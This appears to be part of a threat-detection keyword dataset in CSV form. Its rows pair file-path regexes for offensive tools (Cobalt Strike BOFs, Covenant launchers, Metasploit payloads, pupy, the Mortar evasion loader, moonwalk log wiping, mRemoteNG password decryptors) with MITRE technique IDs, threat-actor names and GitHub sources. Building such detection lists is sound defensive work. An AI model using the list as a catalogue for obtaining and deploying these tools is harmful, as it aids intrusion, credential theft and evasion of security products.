"*/mmouse-brute.nse*",".{0,1000}\/mmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8869"
"*/mmouse-exec.nse*",".{0,1000}\/mmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8870"
"*/mobaxterm.py*",".{0,1000}\/mobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8871"
"*/mobaxterm.rb*",".{0,1000}\/mobaxterm\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#linux","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","8872"
"*/Mockingjay_BOF.git*",".{0,1000}\/Mockingjay_BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","8873"
"*/modbus-discover.nse*",".{0,1000}\/modbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8874"
"*/Models/PowerShellLauncher.*",".{0,1000}\/Models\/PowerShellLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8875"
"*/Models/Regsvr32Launcher.*",".{0,1000}\/Models\/Regsvr32Launcher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8876"
"*/Models/ShellCodeLauncher.*",".{0,1000}\/Models\/ShellCodeLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8877"
"*/Modlishka.git*",".{0,1000}\/Modlishka\.git.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","8878"
"*/module/darkexe/*",".{0,1000}\/module\/darkexe\/.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","8879"
"*/Modules/Exitservice/uinit.exe*",".{0,1000}\/Modules\/Exitservice\/uinit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","8880"
"*/modules/kull_m_crypto_system.h*",".{0,1000}\/modules\/kull_m_crypto_system\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","#linux","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","8881"
"*/modules/payload/*",".{0,1000}\/modules\/payload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8882"
"*/modules/windows/shinject/*",".{0,1000}\/modules\/windows\/shinject\/.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","8883"
"*/momyshark.html*",".{0,1000}\/momyshark\.html.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8884"
"*/momyshark?key=*",".{0,1000}\/momyshark\?key\=.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8885"
"*/momyshark?key=*",".{0,1000}\/momyshark\?key\=.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8886"
"*/mongodb-brute.nse*",".{0,1000}\/mongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8887"
"*/mongodb-databases.nse*",".{0,1000}\/mongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8888"
"*/mongodb-info.nse*",".{0,1000}\/mongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8889"
"*/monkey.py",".{0,1000}\/monkey\.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8890"
"*/monkey_island.py*",".{0,1000}\/monkey_island\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8891"
"*/MonkeyWorks.git*",".{0,1000}\/MonkeyWorks\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","8892"
"*/moonwalk.git*",".{0,1000}\/moonwalk\.git.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8893"
"*/moonwalk_darwin*",".{0,1000}\/moonwalk_darwin.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8894"
"*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","8895"
"*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8896"
"*/Moriarty.git*",".{0,1000}\/Moriarty\.git.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","8897"
"*/mortar.git*",".{0,1000}\/mortar\.git.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8898"
"*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8899"
"*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8900"
"*/mortar-loader.html*",".{0,1000}\/mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8901"
"*/mount/dropbox/Dropbox/pac2*",".{0,1000}\/mount\/dropbox\/Dropbox\/pac2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","8902"
"*/Mouse Overheat.exe*",".{0,1000}\/Mouse\sOverheat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8903"
"*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8904"
"*/mqtt_check.py*",".{0,1000}\/mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8905"
"*/mqtt-subscribe.nse*",".{0,1000}\/mqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8906"
"*/mrd0x.html*",".{0,1000}\/mrd0x\.html.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","8907"
"*/mremoteng.py*",".{0,1000}\/mremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8908"
"*/mRemoteNG-Decrypt*",".{0,1000}\/mRemoteNG\-Decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","8","2","146","42","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z","8909"
"*/mremoteng-decrypt.git*",".{0,1000}\/mremoteng\-decrypt\.git.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8910"
"*/mremoteng-decrypt/releases/download/*",".{0,1000}\/mremoteng\-decrypt\/releases\/download\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8911"
"*/mremoteng-decrypt/tarball/*",".{0,1000}\/mremoteng\-decrypt\/tarball\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8912"
"*/mremoteng-decrypt/zipball/*",".{0,1000}\/mremoteng\-decrypt\/zipball\/.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","8913"
"*/mrinfo.nse*",".{0,1000}\/mrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8914"
"*/Mr-Un1k0d3r/*",".{0,1000}\/Mr\-Un1k0d3r\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","8915"
"*/Mr-xn/cve-2022-23131*",".{0,1000}\/Mr\-xn\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","N/A","2","151","47","2024-08-11T18:14:56Z","2022-02-18T11:51:47Z","8916"
